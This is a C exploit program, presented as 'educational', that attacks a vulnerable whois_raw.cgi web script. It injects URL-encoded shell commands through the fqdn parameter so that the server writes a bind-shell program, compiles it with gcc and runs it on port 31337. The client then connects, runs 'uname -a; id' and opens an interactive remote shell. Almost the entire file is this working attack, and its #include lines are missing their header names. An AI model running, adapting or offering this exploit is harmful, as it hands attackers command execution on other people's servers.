/* * whois_raw.pl CGI-exploit by lore * coded in 15 minutes * * I take no responsibility for your actions. This code is for * educational purposes only. * * http://www.r00tabega.com */ #include #include #include #include #include #include #include #include #include #include #define TRUE 0x00000001 #define FALSE 0x00000000 #define ERR 0xffffffff typedef long sock_t; typedef u_long ip_t; typedef u_short port_t; #define H1 "GET /cgi-bin/whois_raw.cgi?fqdn=%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%7 3%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20>%20hi.c" #define H2 "GET /cgi-bin/whois_raw.cgi?fqdn=%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6 e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27>>%20hi.c" #define CODE "GET /cgi-bin/whois_raw.cgi?fqdn=%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61 %64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%7 3%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b% 62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c %33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%6 4%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c% 32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20>>hi.c" #define COMPILE "GET /cgi-bin/whois_raw.cgi?fqdn=%0agcc%20-o%20hi%20hi.c" #define HAX0R "GET /cgi-bin/whois_raw.cgi?fqdn=%0a%2e%2f%68%69%20" #define WHOAMI "uname -a; id;\n" int main (int, char * *); void simshell (int); void send_tcp_conn (char *, ip_t, port_t, int); sock_t tcp_conn (ip_t, port_t); ip_t resolve (u_char *); int main (int argc, char * * argv) { sock_t fd; ip_t ipaddr; if (argc < 2) { fprintf(stderr, "Usage: %s \n", *argv); exit(EXIT_SUCCESS); } else if ((ipaddr = resolve(argv[1])) == ERR) { fprintf(stderr, "Couldn't resolve that.\n"); exit(EXIT_SUCCESS); } fprintf(stderr, "whois_raw.pl exploit by lore \n"); fprintf(stderr, "i take no responsibility for this\n\n"); fprintf(stderr, "Owning %s: ", argv[1]); send_tcp_conn(H1, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(H2, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(CODE, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(COMPILE, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(HAX0R, ipaddr, 80, 1); fprintf(stderr, "."); fprintf(stderr, "\nShould go into a shell now\n"); fd = tcp_conn(ipaddr, 31337); send(fd, WHOAMI, strlen(WHOAMI), 0); simshell(fd); } void simshell (int fd) { char buf[255]; fd_set in_set; while (1) { FD_ZERO(&in_set); FD_SET(0, &in_set); FD_SET(fd, &in_set); if ((select(fd + 1, &in_set, 0, 0, NULL))) { if (FD_ISSET(fd, &in_set)) { memset(buf, 0, 255); recv(fd, buf, 255, 0); if (!*buf) exit(EXIT_SUCCESS); fprintf(stderr, buf); } else if (FD_ISSET(0, &in_set)) { memset(buf, 0, 255); read(0, buf, 255); send(fd, buf, strlen(buf), 0); } } } } void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis) { sock_t fd; if ((fd = tcp_conn(ipaddr, port)) > 0) send(fd, buf, strlen(buf), 0); if (!dis) close(fd); } sock_t tcp_conn (ip_t addr, port_t port) { sock_t ret; struct sockaddr_in sa; sa.sin_addr.s_addr = addr; sa.sin_port = htons(port); sa.sin_family = AF_INET; if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR) return (ERR); else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct sockaddr_in))) == ERR) return (ERR); return (ret); } ip_t resolve (u_char * host) { struct in_addr addr; struct hostent * hp; if ((addr.s_addr = inet_addr(host)) == ERR) { if (!(hp = gethostbyname(host))) return (ERR); memcpy(&addr.s_addr, hp->h_addr, hp->h_length); } return (addr.s_addr); } /* EOF */